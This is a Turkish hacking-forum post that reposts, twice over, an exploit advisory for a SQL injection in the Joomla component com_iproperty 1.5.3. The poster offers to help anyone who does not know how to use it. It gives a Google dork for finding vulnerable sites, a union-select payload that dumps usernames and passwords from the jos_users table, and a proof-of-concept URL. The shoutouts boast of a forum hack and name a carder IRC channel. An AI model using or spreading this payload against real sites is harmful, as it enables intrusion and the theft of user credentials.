Selamın Aleyküm Arkadaşlar
Sizlere Joomla SQL İnjection Açığının Exploit Code Veriyorum
By-Trojan Not // Açığı Kullanmayı Bilmiyen Arkadaşlar Var İse Yardımcı Olurum
Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : [Linkleri görebilmek için üye olun veya giriş yapın.]
Date : April, 15-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Thinkery Intellectual Property
Vendor : [Linkleri görebilmek için üye olun veya giriş yapın.]
Price : $225 USD
Version : 1.5.3 Other versions may also be affected
Google Dork : inurl:com_iproperty
Intellectual Property allows independent real estate agents, brokers, or property
management companies to upload and maintain property listings for sale, for rent and for lease.
Upload photos, add categories, sub-categories, agent profiles, company profiles.
Search with an advanced Google Map-Ajax-based map interface. Allow users to save and
manage favorite properties. Quickly customize colors, filters, galleries and more!
----------------------------------------------------------------
Exploitz:
~~~~~~~
-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,group_concat(username,char(5 ,password)v3n0m/**/from/**/jos_users--
SQLi p0c:
~~~~~~~
[Linkleri görebilmek için üye olun veya giriş yapın.][path]/index.php?option=com_iproperty&view=agentpropertie s&id=[elich4]
----------------------------------------------------------------
Shoutz:
~~~~
- 'oH lawd !! Malingsial lame forum g0t hacked for second times by Us,lulz...'
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,ei delweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,c4uR [tumben ga bawa martabak??],mywisdom,yadoy666,udhit
- elicha cristia [me too... [Resimleri görebilmek için üye olun veya giriş yapın.]]
- N.O.C & Technical Support @office
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~
v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com
Homepage: [Linkleri görebilmek için üye olun veya giriş yapın.] << Update donk >_<
---------------------------[EOF]-----------------------------
__________________
Sizlere Joomla SQL İnjection Açığının Exploit Code Veriyorum
By-Trojan Not // Açığı Kullanmayı Bilmiyen Arkadaşlar Var İse Yardımcı Olurum
WEB.ID
------------------------------------------------------------- Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : [Linkleri görebilmek için üye olun veya giriş yapın.]
Date : April, 15-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Thinkery Intellectual Property
Vendor : [Linkleri görebilmek için üye olun veya giriş yapın.]
Price : $225 USD
Version : 1.5.3 Other versions may also be affected
Google Dork : inurl:com_iproperty
Intellectual Property allows independent real estate agents, brokers, or property
management companies to upload and maintain property listings for sale, for rent and for lease.
Upload photos, add categories, sub-categories, agent profiles, company profiles.
Search with an advanced Google Map-Ajax-based map interface. Allow users to save and
manage favorite properties. Quickly customize colors, filters, galleries and more!
----------------------------------------------------------------
Exploitz:
~~~~~~~
-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,group_concat(username,char(5 ,password)v3n0m/**/from/**/jos_users--
SQLi p0c:
~~~~~~~
[Linkleri görebilmek için üye olun veya giriş yapın.][path]/index.php?option=com_iproperty&view=agentpropertie s&id=[elich4]
----------------------------------------------------------------
Shoutz:
~~~~
- 'oH lawd !! Malingsial lame forum g0t hacked for second times by Us,lulz...'
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,ei delweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,c4uR [tumben ga bawa martabak??],mywisdom,yadoy666,udhit
- elicha cristia [me too... [Resimleri görebilmek için üye olun veya giriş yapın.]]
- N.O.C & Technical Support @office
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~
v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com
Homepage: [Linkleri görebilmek için üye olun veya giriş yapın.] << Update donk >_<
---------------------------[EOF]-----------------------------
__________________